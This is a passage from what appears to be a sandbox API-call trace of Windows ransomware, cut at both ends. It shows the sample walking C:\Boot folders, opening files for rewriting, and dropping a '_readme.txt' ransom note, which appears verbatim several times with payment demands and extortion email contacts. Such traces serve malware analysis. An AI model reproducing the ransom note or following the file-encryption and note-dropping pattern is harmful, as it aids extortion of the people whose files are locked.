lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.898] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0227.898] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.898] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.898] PathFindFileNameW (pszPath="") returned="" [0227.898] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.899] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.899] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.900] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.900] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0227.900] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0227.900] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.900] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.900] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.901] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.901] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.901] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.901] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0227.901] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.901] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.901] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.901] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.901] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.915] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.915] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.915] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.915] PathFindFileNameW (pszPath="") returned="" [0227.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.915] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.916] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.916] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.916] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.917] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0227.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.917] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0227.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.917] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 